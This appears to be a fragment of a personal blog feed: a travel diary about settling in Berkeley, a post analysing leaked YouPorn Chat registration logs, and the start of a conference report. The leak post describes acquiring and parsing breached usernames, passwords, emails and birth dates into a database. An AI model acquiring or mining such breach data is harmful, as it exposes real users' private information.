frame. &lt;a class="reference external" href="http://www.usairways.com/"&gt;US Airways&lt;/a&gt; had great flights to Oakland (OAK) airport from
Zurich (ZRH) via Philadelphia (PHL) and Phoenix (PHX). The flight from
ZRH to PHL was uneventful; US Airways is a cheap airline with no
entertainment system whatsoever, but if you carry a good
book or a tablet the time passes quickly. A couple of years ago US
Airways decided to remove all the in-flight entertainment systems to cut
down on costs. In my opinion this was a great idea as more and more
people bring their tablets (with preloaded movies and series) and no
longer need the entertainment system anyway. Plus, on my flight from ZRH
to San Francisco (SFO) with &lt;a class="reference external" href="http://www.swiss.com/"&gt;Swiss Airlines&lt;/a&gt; earlier this year the
screen was broken on my seat, and on the way back the entertainment
system was not working for the complete economy part of the plane.
When we landed in PHL we had to wait around 90 minutes for immigration
plus an additional 60 minutes at security. Immigration itself was smooth,
but we ended up missing our flight to PHX; our bags, unfortunately, made it
onto the flight. The transfer guys at the US Airways desk did a great job
and rerouted us on the same day to SFO instead. We were told that the
bags would be delivered soon - but that is a different chapter.
After arriving at our hotel, the &lt;a class="reference external" href="http://berkeleyhostel.com/"&gt;Piedmont House&lt;/a&gt;, we discovered that
this hostel has no reception and is basically some sort of frat house
for weird people. A bunch of guys and girls live there together
without any organisation whatsoever. When you &amp;quot;check in&amp;quot; you grab
some keys from the key board and then try to find your room. The
online advertisement looked good, the pictures were nice, and the self
check-in sounded like a great idea (I assumed some online system that
would hand us a room card when entering) but our expectations were a bit
too high. Just so you can relate: I consider myself a traveler and I
have stayed in my fair share of shabby hostels without much trouble, but
Piedmont House is pretty bad.&lt;/p&gt;
&lt;p&gt;The house and the rooms are very old and smelly, and the bathrooms are
subpar (i.e., there are two showers for 10 rooms or so, but only one shower
works; the other shower stall is used as storage for old lamps and
stuff). The house features a shared kitchen as well; watch out: if you
store food in one of the shared fridges it might disappear, and there
are rats (and mouse traps) in the kitchen. Unfortunately we booked a
double room for one week. As we arrived in the week before the new
semester, all hotel rooms in the area were booked and the hotels had
tripled their prices, yet I would still advise you to stay in a
different hotel, with a friend, or just sleep in the park! We tried
to get hold of somebody (i.e., the owner or some staff) to tell
them that we were expecting our bags from the airline, but no luck. We
managed to tell them the next day that we were expecting bags, but none
of the staff seemed to care. Later, when we were reunited with our bags,
we found out that the US Airways delivery guy had tried to deliver the bags
twice and nobody answered the door, nor did anybody answer the phone
number that is listed on the Piedmont House contact page. That's what I
call a shitty hostel!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="day-1-august-21st-a-brave-new-world-and-apartment"&gt;
&lt;h2&gt;Day 1 (August 21st): a brave new world (and apartment)&lt;/h2&gt;
&lt;p&gt;This was the time when Lumi (nickname of my wife Anna Barbara) hit rock
bottom for the first time: the combination of a new country, immigration,
losing our bags, a crappy shabby 'hostel' room, and disgusting shower
stalls. As soon as we had breakfast we started looking for an apartment
in the area.&lt;/p&gt;
&lt;p&gt;The areas we considered were &lt;em&gt;Berkeley&lt;/em&gt; (obviously), &lt;em&gt;Emeryville&lt;/em&gt;,
&lt;em&gt;Oakland&lt;/em&gt;, &lt;em&gt;Albany&lt;/em&gt;, and &lt;em&gt;El Cerrito&lt;/em&gt;. &lt;em&gt;Berkeley&lt;/em&gt; is a very vibrant
student city and offers everything you need. South of the UC you find
all the student housing, fraternity parties, cheap eats, and Telegraph
avenue with lots of shops and food options. West of the UC you find the
so called gourmet ghetto with even more food options and a couple of
hotels and motels along University avenue. Prices for a one-bedroom
apartment are around 1300$ to 2000$, plus there is huge competition when
you look for an apartment (an owner told us that he got 60 calls in 2
hours for one apartment; 10 people would have signed the contract without even
looking at the apartment). &lt;em&gt;Emeryville&lt;/em&gt; is south of Berkeley with a 3 to
6 mile commute to the UC, and housing is a little cheaper. If you like an
all-inclusive resort, have a look at the &lt;a class="reference external" href="http://www.watergatecommunityassociation.com/"&gt;Watergate community&lt;/a&gt;: they
offer swimming pools, tennis courts, and whirlpools, all included in the
rent. Unfortunately no apartment was vacant when we were
looking. &lt;em&gt;Oakland&lt;/em&gt; is even further from Berkeley and comes with a 4 to
10 mile commute to the UC; if you want to live there you should consider
taking the &lt;a class="reference external" href="http://www.bart.gov/"&gt;BART&lt;/a&gt; or the &lt;a class="reference external" href="http://www.actransit.org/"&gt;Bus&lt;/a&gt;. Apartment prices are even cheaper but
the area can be a bit dodgy, so watch out. &lt;em&gt;Albany&lt;/em&gt; is a small village
north-west of Berkeley and comes with a 3 to 4 mile commute to the UC.
Albany offers many shops, restaurants, pubs, and other small village
perks around Solano avenue and San Pablo avenue. &lt;em&gt;El Cerrito&lt;/em&gt; is a bit
further up north from Albany and comes with a 4 to 8 mile commute to the
UC.&lt;/p&gt;
&lt;p&gt;If you want to find something in the bay area that is not new you will
have to check out craigslist. &lt;a class="reference external" href="http://sfbay.craigslist.org/eby/"&gt;Craigslist&lt;/a&gt; is like an online black
board with millions of postings and listings. You can get everything on
craigslist from second hand toasters, to bikes, to cars, up to
apartments. We looked at more than 200 apartment listings in the areas
described above, sent more than 20 emails to the different owners,
called around 10 owners, got 5 appointments, and looked at two
apartments. All on one day. The market is very competitive and you have
to sweet-talk people into leasing you the apartment right away. We
decided quickly to take the second apartment we looked at, stuck around
after the showing, and settled the lease with the property manager
(including handing over the cashier's check for the deposit and the down
payment) before the others could even hand in their applications
for the apartment. The two-bedroom apartment we got is in Albany and the
commute to UC is around 3.2 miles, plus there is a bus stop right in
front of the apartment. Good news: we can move in on Sunday (in 5 days).&lt;/p&gt;
&lt;p&gt;A note on transportation: public transportation in the bay area is
reasonable (good compared to other areas in the US, bad compared to
Switzerland). &lt;a class="reference external" href="http://www.caltrain.com/"&gt;Caltrain&lt;/a&gt; (a commuter train) connects San Francisco with
San Jose; &lt;a class="reference external" href="http://www.bart.gov/"&gt;BART&lt;/a&gt; (a light railway) connects both international
airports, San Francisco, Berkeley, and Richmond. &lt;a class="reference external" href="http://www.actransit.org/"&gt;AC Transit&lt;/a&gt; (a bus
line) connects the cities on the east bay.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="day-2-august-22nd-organizing-a-ride"&gt;
&lt;h2&gt;Day 2 (August 22nd): organizing a ride&lt;/h2&gt;
&lt;p&gt;No matter how good public transport is you'll still need a car in the
US. In Zurich we were able to live without a car for the last 10 years
but the distances are just longer here in the US and even for basic
tasks like grocery shopping, going to a workout, or going to the movies
you'll need a car. Our plan was to get the smallest car possible and we
set ourselves a budget of 4k$ for a used car with less than 150k miles
and not older than 10 years or &amp;lt;10k$ for the smallest new car that we
could find. We talked to a couple of friends, I read tons of online
posts about the topic, and the consensus was: never buy a used car at a used
car dealer. They basically offer the same guarantees as private sellers,
but they add 1k$ on top of the private-sale price and they will tell you anything (aka
they are professional liars). That's why we started with craigslist.
Generally we followed this great &lt;a class="reference external" href="http://eagain.net/blog/2007/02/20/buy-a-car.html"&gt;checklist&lt;/a&gt; on how to buy a used car
and we used &lt;a class="reference external" href="http://www.autocheck.com/"&gt;Autocheck&lt;/a&gt; to check the VINs of all the cars we
looked at. A VIN check shows the registered mileage, any accidents
the car was in, and other general information that helps you make up
your mind about the price.&lt;/p&gt;
&lt;p&gt;It was actually harder than expected to find a car that met
our criteria (&amp;lt;10 years old, &amp;lt;150k miles, &amp;lt;4k$), but finally we found a
Mazda Protege from 2001 with 138k miles for 2650$ and a Toyota Corolla
from 1999 for 3500$. We called both sellers and organized test drives for
the next day.&lt;/p&gt;
&lt;p&gt;This afternoon our bags finally arrived. I had to call US Airways a
couple of times until I got to the right person and I was then told that
they already tried to deliver the bags twice but nobody picked up the
phone at our hotel and that nobody would answer the door. Luckily I got
a very understanding and friendly person on the other end and she
organized a third delivery of our bags. I waited on the veranda until we
were finally reunited with our bags. Thanks again Piedmont House for not
answering the phone nor opening the door when a delivery guy comes by.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="day-3-august-23rd-banking-troubles-1-and-meeting-our-ride-marvin"&gt;
&lt;h2&gt;Day 3 (August 23rd):&amp;nbsp;banking troubles (1) and&amp;nbsp;meeting our ride Marvin&lt;/h2&gt;
&lt;p&gt;As we were slowly running low on dollars we tried to wire money (10k$)
from Switzerland to our &lt;a class="reference external" href="https://www.wellsfargo.com/"&gt;Wells Fargo&lt;/a&gt; account and asked a Wells Fargo
banker to write down the wiring instructions for our checking account.
From an earlier fraudulent charge I ended up with two checking accounts,
one with the money and one with 0$ in it. We closed the account with 0$
and found out afterwards that the banker gave us the wiring information
for the checking account with 0$ in it. The wire ended up somewhere in
the air: Wells Fargo removed 72$ from the 10k$ and sent the money back,
we paid the conversion fees twice (CHF to USD and USD to CHF), and
we basically lost 250$ in this transaction thanks to confusing
information from a Wells Fargo banker. Compared to Europe the US banking
system is completely broken; everything relies on checks, and money
transfers between banks are completely inconvenient and a huge hassle.
Another huge problem is that the average banker (at any bank) is just a
trained monkey. The bankers will lie to your face and tell you any
misinformation they want just to 'help' you. All of them are very
friendly and sound kind of competent. But different bankers contradict
whatever the previous banker said. As a banker in the US you don't need
any training or education; you don't even need a clue what's going on.
For example, I had a life-long free account and I got a fraudulent
charge on my debit card. Instead of just issuing a new debit card (with
a new number) banker A decided to sign me up for a new checking and new
savings account that is no longer free, as there was no way of issuing a
new card with a new number according to her. That's how I ended up with
2 savings and 2 checking accounts in the first place. She told me that
the account would be free and she would set up some transfers and get
everything ready. Banker B told me that we could close the old bank
accounts so that I would only have one checking and one savings account left
(shortly thereafter the wire arrived and we lost our 250$). Banker C
then told me that bankers A and B were full of shit and that we could
have kept the other free accounts. Some bankers told us that we could use
our European Maestro (EC) cards to withdraw money, others told us we
couldn't. Basically no two bankers told us the same consistent story or
information. This makes it very hard to trust the US banking system, as
Wells Fargo appears to be one of the better banks. My conclusion: never
leave too much money in the US, transfer as much as possible back to
your home accounts where banking is a serious business and not just a
joke.&lt;/p&gt;
&lt;p&gt;In the afternoon we had our appointment with Jason to test drive the
first car. We liked the stick-shift Mazda Protege from the start; the
car was in good shape and the test drive went smoothly. One of the most
important things when buying a second-hand car is to bring it to a
mechanic, and after reading the &lt;a class="reference external" href="http://www.yelp.com/biz/steves-auto-care-el-cerrito"&gt;Yelp reviews&lt;/a&gt; we decided to go to
&lt;a class="reference external" href="http://www.stevesautocare.net/"&gt;Steve's Auto Care&lt;/a&gt; in El Cerrito. We didn't have an appointment and
Steve told us that we were a bit too late and that he couldn't do a full
check, yet he looked at the car for almost 30 minutes and gave us great
information about the state of the car and what to expect. That's when
we decided that whenever we had any repairs we would go to Steve! In the
end we decided to buy the Mazda as it was a good deal and we
both liked the car. We scheduled to hand over the money in cash the
next day, as the amount was low enough not to bother with a cashier's
check.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="day-4-august-24th-happy-birthday"&gt;
&lt;h2&gt;Day 4 (August 24th): happy birthday&lt;/h2&gt;
&lt;p&gt;Today was my wife's birthday and I surprised her with breakfast in bed
with some cake and a nice card. After breakfast I started calling
different people. We organized renter's insurance for our apartment and
car insurance for our new car so that we could drive from Jason's house
to our apartment. &lt;a class="reference external" href="http://www.geico.com/"&gt;Geico&lt;/a&gt; was the insurer of our choice for both the
car insurance and the home insurance as they offered a reasonable deal
and coverage (around 250$ each). After covering the insurance we got
ourselves appointments at the &lt;a class="reference external" href="http://www.dmv.ca.gov/"&gt;DMV&lt;/a&gt; for our written driving tests - the
international driving license is not accepted in the US and you need to
redo both the written and the behind-the-wheel test. After sorting out
all our telephone calls we went on an online shopping spree on Amazon
Prime and bought a router, a modem, and other stuff to start up our digital
life.&lt;/p&gt;
&lt;p&gt;In the afternoon we celebrated Lumi's birthday by going to the movies
and watching Brave. Later we took the BART to Jason's place and finally bought
our car - we named him Marvin and parked him in the garage of our
apartment.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="day-5-august-25th-the-lush-life"&gt;
&lt;h2&gt;Day 5 (August 25th): the lush life&lt;/h2&gt;
&lt;p&gt;In the last couple of days we were able to find an apartment and buy
a car; we deserved a day off! We slacked around for a bit, walked around
on the campus, and went to an all-you-can-eat pizza place near Telegraph
avenue. Afterwards we went to the movies again. I guess we deserved it!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="day-6-august-26th-moving-in"&gt;
&lt;h2&gt;Day 6 (August 26th): moving in&lt;/h2&gt;
&lt;p&gt;In the US you can actually move in on Sundays. We were very happy to
leave crappy Piedmont House and took the bus to our new apartment.
Unfortunately we got quite an unpleasant surprise: the apartment had not
been cleaned by the previous tenant. The whole place was quite yucky: the
kitchen and bathroom floors were uncleaned and very sticky, the
shelves were very dirty with leftover stuff in them as well, and the
stove and oven were super dirty and sticky. We thought hard about what we
should do, and in the end we decided to go to &lt;a class="reference external" href="http://www.target.com/"&gt;Target&lt;/a&gt; to buy cleaning
material and to clean the floor and some of the shelves and cupboards we
use. We just put all the baking trays and all the other stuff that was
lying around into a cupboard and closed it until we move out. That's
when Lumi hit rock bottom for the second time. For our own protection we took lots
of pictures so that the owner cannot complain if we do not clean the
apartment when we move out.&lt;/p&gt;
&lt;p&gt;In the morning we bought a GPS navigation system for our car - these
things are so convenient! In the afternoon we went to Ikea and bought
all the basic kitchen stuff, a mattress, a table, a coffee table, and lots
of other small things. Until late at night we spent our time building
all the stuff we bought, and I even managed to wreck our living room
table by turning the screws in so tight that they came out at the top.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="first-week-recap"&gt;
&lt;h2&gt;First week recap:&lt;/h2&gt;
&lt;p&gt;We managed to move out of the worst youth hostel ever without getting
any diseases (I was bitten a couple of times by something that lived in
the mattress), we found a place to stay, we bought a car, we got the
apartment cleaned up and made it livable. If you are interested in how
much money you'll need for the start: apartment 2000-4000$ deposit and
first week, car 2000-4000$, furniture and basic appliances: 1000-2000$.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="day-7-august-27th-building-a-place-to-live"&gt;
&lt;h2&gt;Day 7 (August 27th): building a place to live&lt;/h2&gt;
&lt;p&gt;We went to Ikea again to buy a second table plus more chairs. This way
we can use the wrecked table as a desk in the second bedroom and if we
have many guests we can put both tables together. Our next item on the
list was to go to Target and buy all the basic food stuff that we need.
We spent the rest of the day building, constructing, and cleaning.
The sad part of this day was that our Swiss Mastercard was blocked. The
fraud protection kicked in when we tried to buy furniture from Ikea the
second time. I had to call the emergency number to get the card
reactivated.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="day-8-august-28th-the-written-dmv-test"&gt;
&lt;h2&gt;Day 8 (August 28th): the written DMV test&lt;/h2&gt;
&lt;p&gt;We assumed that having an appointment would save us the wait, but you
have to wait at the DMV even with an appointment (around 30 minutes; if
you don't have an appointment you have to wait up to 3 hours). The written
driving exam was a piece of cake. We studied for about 3 hours each; Lumi
aced the test, and I had one mistake (6 mistakes are allowed).&lt;/p&gt;
&lt;p&gt;In the afternoon we went on another shopping spree and bought our couch
at Target and a huge amount of other stuff online: a bike to commute to
UC, a TV from &lt;a class="reference external" href="http://www.woot.com/"&gt;Woot&lt;/a&gt;, and a bed box from &lt;a class="reference external" href="http://www.walmart.com/"&gt;Walmart&lt;/a&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="day-9-august-29th-getting-settled-and-meeting-the-gang"&gt;
&lt;h2&gt;Day 9 (August 29th): getting settled and meeting the gang&lt;/h2&gt;
&lt;p&gt;While I had to attend one of the most boring meetings ever, Lumi had fun
with the Comcast guy who installed our internet access. As part of the
J1 visa I had to attend the mandatory visa information meeting. If you
don't attend this meeting then you don't get authorization to travel
outside the US during your postdoc. As this was my second time as a J1
the meeting did not yield any additional information for me and I just
had to sit it out.&lt;/p&gt;
&lt;p&gt;I thought that I could visit the other postdocs and PhD students while I
was at Berkeley. During lunch I met with the security reading group and
got to know some interesting people.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="day-10-august-30th-meeting-mario-and-family"&gt;
&lt;h2&gt;Day 10 (August 30th): meeting Mario and family&lt;/h2&gt;
&lt;p&gt;This was the first time we tried to do sports here in the US. We went
running but the GPS did not pick up a signal until we finished our
track. We found some spots with a great view over the bay area. Later
that night we were invited by Mario and his family to have dinner at
their place. What a wonderful and relaxing night.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="day-11-august-31st-trying-to-work"&gt;
&lt;h2&gt;Day 11 (August 31st): trying to work&lt;/h2&gt;
&lt;p&gt;Our last Ikea and Walmart trip. We bought the last couple of things we
forgot the last times and completed our furniture.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="day-12-september-1st-beautify-the-apartment-and-checking-out-the-nightlife"&gt;
&lt;h2&gt;Day 12 (September 1st): beautify the apartment and checking out the nightlife&lt;/h2&gt;
&lt;p&gt;Lumi started painting the walls and beautifying our apartment while I
tried to work a couple of hours. After almost 1 1/2 months of holidays
it's kind of hard to get back into &amp;quot;work mood&amp;quot;. After work we went
bowling at our local &lt;a class="reference external" href="http://www.thealbanybowl.com/"&gt;bowling alley&lt;/a&gt;. Later that night we found out
that it is kind of hard to get food in the US after 10pm if you are not
driving around. Sizzler, Taco Bell, and McDonalds all close between 9pm
and 10pm for walk-in customers. On the other hand, the Taco Bell and
McDonalds drive-throughs are open all night long. We actually have to get
used to this kind of mentality.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="second-week-recap"&gt;
&lt;h2&gt;Second week recap:&lt;/h2&gt;
&lt;p&gt;We started making the apartment livable, built all of our furniture,
passed the written DMV test, got internet access, went to the visa
information meeting, and had a meeting with the other postdocs. This week
was kind of productive and we managed to get settled in our new home.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusion-so-far-so-good"&gt;
&lt;h2&gt;Conclusion: so far, so good&lt;/h2&gt;
&lt;p&gt;We had a hard start, got lucky with the apartments and the car and
managed to play our cards well. Our experience shows that you need at
least one week to organize an apartment and a car. The second week is
optional and helps to construct all the furniture and to get settled in.
During your first two weeks you have to accept that you will hit rock bottom once
or twice - the culture shock combined with a huge list of stuff that you
need to do can be demanding and tough, but you'll get over it. Plan well
and it will end well.&lt;/p&gt;
&lt;p&gt;One of the things we have to get used to around here is that the culture
is so different: everything is built on the cheap and optimized for a low
purchase price combined with high running costs. Apartments have no
insulation but gas heating; cars are cheap but need more fuel per
distance compared to European cars.&lt;/p&gt;
&lt;p&gt;We have settled in for the next year and we are ready for visitors. We
have already partially explored the area, but there is still lots to see and
we are always happy when people join us!&lt;/p&gt;
&lt;/div&gt;
</content><category term="Academia"></category><category term="PostDoc"></category><category term="California"></category><category term="Housing"></category><category term="Berkeley"></category><category term="Apartment"></category><category term="Expat"></category><category term="Car"></category></entry><entry><title>Hard data on YouPorn</title><link href="/blog/2012/0222-hard-data-on-youporn.html" rel="alternate"></link><published>2012-02-22T17:54:00-05:00</published><updated>2012-02-22T17:54:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2012-02-22:/blog/2012/0222-hard-data-on-youporn.html</id><summary type="html">&lt;div class="section" id="introduction"&gt;
&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;As you might have heard (or not) YouPorn Chat had a huge information
leak on February&amp;nbsp;21st 2012. One of their servers served a directory with
all registration log&amp;nbsp;files from the last couple of years
(&lt;em&gt;http://chat.youporn.com/tmp&lt;/em&gt;). Apparently this chat server is not
serviced by …&lt;/p&gt;&lt;/div&gt;</summary><content type="html">&lt;div class="section" id="introduction"&gt;
&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;As you might have heard (or not), YouPorn Chat had a huge information
leak on February 21st, 2012. One of their servers served a directory with
all registration log files from the last couple of years
(&lt;em&gt;http://chat.youporn.com/tmp&lt;/em&gt;). Apparently this chat server is not
serviced by the YouPorn guys but by the YouPorn chat guys, according to
their &lt;a class="reference external" href="http://blog.youporn.com/youporn-data-not-exposed/"&gt;blog post&lt;/a&gt;. Nevertheless, I assume that there is a huge
overlap between the passwords for the chat service and for YouPorn in
general, as well as for other accounts. The files were world-readable
and could be downloaded. Some Swedish guys at &lt;a class="reference external" href="https://www.flashback.org/t1802006"&gt;flashback.org&lt;/a&gt; discussed
what they could do with the log files. They discovered that the logs
contained the registration and account creation details of all
users from 2008 to 2012, and they shared them with the world. Soon
thereafter &lt;a class="reference external" href="https://twitter.com/#!/nilssonanders"&gt;Anders Nilsson&lt;/a&gt; published an analysis of all passwords on
his &lt;a class="reference external" href="http://blog.eset.se/password-statistics-for-leaked-youporn-passwords/"&gt;blog&lt;/a&gt;. His analysis shows the top passwords along with some
statistics about the different passwords. Unsurprisingly, the top 10
passwords are 123456, 123456789, 12345, 1234, password, qwert, 12345678,
1234567, 123, and 111111. But analyzing passwords is only the first
step.&lt;/p&gt;
&lt;p&gt;When I read about the password breach on Twitter I thought that we could
do more with the available data, and I got my hands on a copy of the
logs. The log files show detailed information about username, password,
email address, country of origin, date of birth, and user id. So let's
play!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="log-format"&gt;
&lt;h2&gt;Log format&lt;/h2&gt;
&lt;p&gt;The log format is really simple and consists of logged registration
attempts and server responses. A registration attempt is logged in the
following format:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
&amp;lt;user_register.php: 2010-01-11 00:00:03
  POST
  username=MyFunnyUsername
  email=Mail&amp;#64;Foo
  email_confirm=Mail&amp;#64;Foo
  password=1234
  password_confirm=1234
  country=US
  msisdn=
  isyp=0
  isPremiumChat=
  dob=1990-08-17
  sub1=1
  sub2=1
  is3g=
&amp;gt;
&lt;/pre&gt;
&lt;p&gt;I guess that username, email, password, country, and dob (date of birth)
are self-explanatory. The server responds either with a reply that there
was an error or with a new user id.&lt;/p&gt;
&lt;p&gt;A registration is unsuccessful if either the email addresses or the
passwords do not match, or if the username is already taken. The error is
encoded in the following message:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
&amp;lt;REPLY username =fucking whore
  status =207
  err_msg =202
&amp;gt;
&lt;/pre&gt;
&lt;p&gt;The reply to a successful registration contains an OK status and a new user id:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
&amp;lt;REPLY username =LaraDWT28SL
  status = OK
  user_id =3565583
&amp;gt;
&lt;/pre&gt;
&lt;p&gt;After downloading the files I had to parse them using some script foo. A
dirty little python script {link file} did the trick. As I wanted to do
some heavy number crunching, and I did not want to spend days
reevaluating the same data over and over again, I imported all the logs
directly into a not-so-small MySQL database. The database has the
following layout:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
CREATE TABLE accounts (
  date DATE,
  username varchar(128),
  password varchar(128),
  email varchar(128),
  dob DATE,
  country varchar(2),
  userid INT DEFAULT -1,
  INDEX (date),
  INDEX (username),
  INDEX (password),
  INDEX (email),
  INDEX (dob),
  INDEX (country),
  INDEX (userid)
) TYPE=InnoDB;
&lt;/pre&gt;
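&lt;p&gt;To give an idea of what the parsing involves, here is an illustrative sketch in Python. This is not the actual import script linked above; it handles a single well-formed record of the format shown earlier and ignores the many malformed entries the real logs contain:&lt;/p&gt;

```python
# Illustrative sketch: parse one registration record into a dict.
# Not the original import script; assumes a well-formed record of
# the format shown above.

def parse_record(record):
    """Parse one '<user_register.php: ...>' block into a dict."""
    lines = record.strip().splitlines()
    # The first line carries the timestamp:
    # "<user_register.php: 2010-01-11 00:00:03"
    header = lines[0]
    date = header.split(": ", 1)[1].split(" ")[0]
    fields = {"date": date}
    # The remaining lines are "key=value" pairs; skip "POST" and ">".
    for line in lines[1:]:
        line = line.strip()
        if "=" in line:
            key, _, value = line.partition("=")
            fields[key] = value
    return fields

record = """<user_register.php: 2010-01-11 00:00:03
  POST
  username=MyFunnyUsername
  email=Mail@Foo
  password=1234
  country=US
  dob=1990-08-17
>"""

parsed = parse_record(record)
print(parsed["date"], parsed["username"], parsed["country"])
# prints: 2010-01-11 MyFunnyUsername US
```

&lt;p&gt;The real script additionally has to match each attempt with the following REPLY block to recover the user id (or the error code) before writing the row to the database.&lt;/p&gt;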
&lt;p&gt;The complete import, i.e., parsing, formatting, MySQL import, and
index generation, took a couple of hours. Due to weird formatting I lost
some accounts during the import, so the numbers are a lower bound on the
true totals.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="analysis"&gt;
&lt;h2&gt;Analysis&lt;/h2&gt;
&lt;p&gt;With so many raw data sets (5,290,696 registration attempts led to 1,202,040
unique user accounts) it is hard to work with text files only, so the
MySQL database was a good choice to start with. One of the most
interesting analyses is the password analysis. Andres already published
a breakdown of the passwords in his &lt;a class="reference external" href="http://blog.eset.se/password-statistics-for-leaked-youporn-passwords/"&gt;blog&lt;/a&gt; and the full results on
&lt;a class="reference external" href="http://pastebin.com/prUbcTmh"&gt;pastebin&lt;/a&gt;. I assume he filtered the raw data for the raw passwords.
Using a database I have the advantage that I can select more detailed
combinations of data. In the following analysis I will look at country-specific
details, registration attempts, email addresses, and the age
distribution of the YouPorn users.&lt;/p&gt;
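&lt;p&gt;With everything in one table, such combinations are a single query
away. For example, a per-country password breakdown boils down to
something like this (an illustration, not the exact query I ran):&lt;/p&gt;
&lt;pre class="literal-block"&gt;
SELECT country, password, COUNT(*) AS n
FROM accounts
GROUP BY country, password
ORDER BY n DESC
LIMIT 20;
&lt;/pre&gt;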
&lt;/div&gt;
&lt;div class="section" id="by-country"&gt;
&lt;h2&gt;By country&lt;/h2&gt;
&lt;p&gt;The top country with most registrations is the US (27%), followed by
Germany (12%), the UK (9%), Italy (5%), the Philippines (4%), Canada
(3%), France (3%), India (3%), Australia (2%), and Mexico (2%). The
graph shows a pie chart of the 20 countries with most registrations.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2012/0223/country-fraction.jpg"&gt;&lt;img alt="image0" src="/blog/static/2012/0223/country-fraction.jpg" style="width: 600px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;If we look at registration attempts then the picture is a little
different. The log files contain a total of 4,088,656 failed registration
attempts next to the 1,202,039 successful registrations, so on average a
user failed more than 3.4 times before he/she was successful.
Typing captchas with one hand must be hard
(pun intended).&lt;/p&gt;
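&lt;p&gt;For the curious, the 3.4 above is just the ratio of the two numbers
from the logs:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
attempts = 4088656
accounts = 1202039
print(round(attempts / accounts, 1))  # prints 3.4
&lt;/pre&gt;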
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2012/0223/country-registrations.tif"&gt;&lt;img alt="image1" src="/blog/static/2012/0223/country-registrations.tif" style="width: 600px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The number of total registrations actually seems to scale by country.
There is no country that has significantly more failed registration
attempts than another country. India, Indonesia, and the Philippines
have a slightly higher number of registration attempts than the other
countries. The table shows the number of registered accounts and the
number of registration attempts.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="age-distribution"&gt;
&lt;h2&gt;Age distribution&lt;/h2&gt;
&lt;p&gt;The age distribution graph shows the fraction of total registrations per
year of birth. The average porn registrant is 31.04 years old, with a
tendency towards younger ages: the most common age is 24, accounting for
7.96% of all registrations. The two peaks in the graph are
around the ages of 32 (year of birth 1980) with 5.72% of total registrants
and 24 (1988) with 7.96%. Above 30, the older people get, the less
likely they are to register.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2012/0223/yob-fraction.jpg"&gt;&lt;img alt="image2" src="/blog/static/2012/0223/yob-fraction.jpg" style="width: 600px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The graph shows a steep rising edge around age 20 that
drops off slowly. The question remains whether younger registrants just enter
fake birth dates or whether they do not register at all. Apparently the
website did not impose any age restrictions, as the years of birth range
from 1908 up to 2007.
Unfortunately real work calls right now, stay tuned for more results!&lt;/p&gt;
&lt;/div&gt;
</content><category term="Security"></category><category term="analysis"></category><category term="YouPorn"></category><category term="passwords"></category><category term="privacy"></category><category term="security"></category></entry><entry><title>28c3 - 28th Chaos Communication Congress &amp; Berlin Sides or a tough week in Berlin</title><link href="/blog/2012/0109-28c3-28th-chaos-communication-congress.html" rel="alternate"></link><published>2012-01-09T13:59:00-05:00</published><updated>2012-01-09T13:59:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2012-01-09:/blog/2012/0109-28c3-28th-chaos-communication-congress.html</id><summary type="html">&lt;p&gt;&lt;img alt="image0" src="/blog/static/2012/0109/28c3.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;Last week we celebrated that special time of the year
again. For me it was the 8th time that we went to the &lt;a class="reference external" href="http://events.ccc.de/category/28c3/"&gt;Chaos
Communication Congress&lt;/a&gt; and the 3rd time that I had a talk. This year
we also had tokens for the &lt;a class="reference external" href="http://berlinsides.org/"&gt;BerlinSides&lt;/a&gt;, a side conference with only
technical …&lt;/p&gt;</summary><content type="html">&lt;p&gt;&lt;img alt="image0" src="/blog/static/2012/0109/28c3.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;Last week we celebrated that special time of the year
again. For me it was the 8th time that we went to the &lt;a class="reference external" href="http://events.ccc.de/category/28c3/"&gt;Chaos
Communication Congress&lt;/a&gt; and the 3rd time that I had a talk. This year
we also had tokens for the &lt;a class="reference external" href="http://berlinsides.org/"&gt;BerlinSides&lt;/a&gt;, a side conference with only
technical talks organized by Aluc.&lt;/p&gt;
&lt;p&gt;We carried out the same procedure as every year; Stormbringer and I met
on December 26th around 7pm-ish at the airport in Zürich for a beer or
two. Unfortunately he was late, so I had to drink alone. No harm was
done as I still had to finish the slides for my talk. The flight was
really smooth and we arrived at 11pm at the hostel. Following our
regular procedure we walked right to the bcc to get our badges (and the
first couple of beers). A couple of things changed this year: the bcc
committee no longer allowed smoking inside the venue, so the hack lounge
(which was very cozy in the last couple of years, with many couches,
music, video installations, and good wired network connectivity) was
replaced by a smoking tent outside of the bcc that had like 1/100 of the
